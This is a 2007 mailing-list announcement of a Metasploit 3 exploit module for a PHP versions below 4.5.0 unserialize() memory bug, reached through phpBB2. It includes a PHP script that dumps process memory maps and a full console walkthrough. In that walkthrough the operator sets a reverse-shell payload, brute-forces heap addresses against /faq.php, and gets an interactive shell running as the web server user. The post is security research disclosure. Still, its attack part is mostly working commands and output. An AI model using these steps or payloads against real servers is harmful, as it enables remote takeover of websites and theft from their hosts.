[framework] Metasploit 3 module for PHP < 4.5.0 unserialize() bug

Sat Mar 10 19:40:17 CST 2007

This is the first metasploit 3 exploit for a vulnerability covered by 
Stefan Esser's Month of PHP bugs. It exploits a PHP interpreter bug 
through a fully-patched version of phpBB2. We are still working on 
a "generic" exploit for all web applications that unserialize() POST 
data. 

This one was tricky because we had to work around the Apache 2 requests 
limits to fit a ridiculous amount of data into multiple cookie headers. 
Stefan Esser should be credited with discovery, patch, the cookie 
technique, and the generic proof-of-concept. GML and I managed to hack 
this module together between last night and this afternoon.

This module sends about 3MB of traffic per request. It needs 900k just to 
trigger the vulnerability and uses another 2MB to make the brute force 
process somewhat fast. You will need a very fast network connection to 
use this module :-)

You can browse the module source online at:
http://metasploit.com/svn/framework3/trunk/modules/exploits/multi/php/php_unserialize_zval_phpbb2.rb

You can read more about the vulnerability at:
http://www.php-security.org/MOPB/MOPB-04-2007.html

Anyone with Metasploit 3 installed can just use 'svn update' to grab the 
latest patches along with this module.  

We are looking for feedback about what address ranges to cover for various
platforms. If you have a Linux system with PHP < 4.5.0, please install the 
following PHP code, access it in your browser, and send me the output.

Your feedback is appreciated!

--start of maps.php---
<pre>
<?php 
	$buff = str_repeat("X", 1024*1024*4);
	readfile("/proc/version");
	readfile("/proc/self/maps"); 
?>
</pre>
--end of maps.php

Quick demonstration:

msf > use exploit/multi/php/php_unserialize_zval_phpbb2

msf exploit(php_unserialize_zval_phpbb2) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux x86 phpBB2

msf exploit(php_unserialize_zval_phpbb2) > set TARGET 0
TARGET => 0

msf exploit(php_unserialize_zval_phpbb2) > set PAYLOAD 
linux/x86/shell_reverse_tcp
PAYLOAD => linux/x86/shell_reverse_tcp

msf exploit(php_unserialize_zval_phpbb2) > set RHOST 127.0.0.1
RHOST => 127.0.0.1

msf exploit(php_unserialize_zval_phpbb2) > set RPORT 80
RPORT => 80

msf exploit(php_unserialize_zval_phpbb2) > set URI /faq.php
URI => /faq.php

msf exploit(php_unserialize_zval_phpbb2) > exploit
[*] Started reverse handler
[*] Creating the request...
[*] Trying address 0xb6000400...
[*] Received a response: 200 OK
[*] Trying address 0xb6100400...
[*] Received a response: 200 OK
[*] Trying address 0xb6200400...
[*] Received a response: 200 OK
[*] Trying address 0xb6300400...
[*] Received a response: 200 OK
[*] Trying address 0xb6400400...
[*] Received a response: 200 OK
[*] Trying address 0xb6500400...
[*] Received a response: 200 OK
[*] Trying address 0xb6600400...
[*] Received a response: 200 OK
[*] Trying address 0xb6700400...
[*] Received a response: 200 OK
[*] Trying address 0xb6800400...
[*] Received a response: 200 OK
[*] Trying address 0xb6900400...
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:50376)
[*] No response from the server

bash -i;
bash: no job control in this shell
apache at shank /home/httpd/phpBB2 $ id
uid=81(apache) gid=81(apache) groups=81(apache)
apache at shank /home/httpd/phpBB2 $

-HD